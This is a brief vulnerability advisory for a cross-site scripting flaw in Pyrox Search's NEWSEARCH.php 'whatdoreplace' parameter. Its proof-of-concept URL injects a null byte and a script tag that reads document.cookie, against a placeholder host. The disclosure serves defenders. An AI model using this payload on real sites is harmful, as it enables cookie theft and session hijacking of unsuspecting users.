Pyrox Search Newsearch.PHP Whatdoreplace Cross-Site Scripting Vulnerability

Pyrox Search Newsearch.PHP Whatdoreplace Cross-Site Scripting Vulnerability

Proof of concept has been provided:

xss exploit:
http://[www.example.com]/[path]/NEWSEARCH.php?whatdoreplace=whatdoreplace%00<script>alert(document.cookie)</script>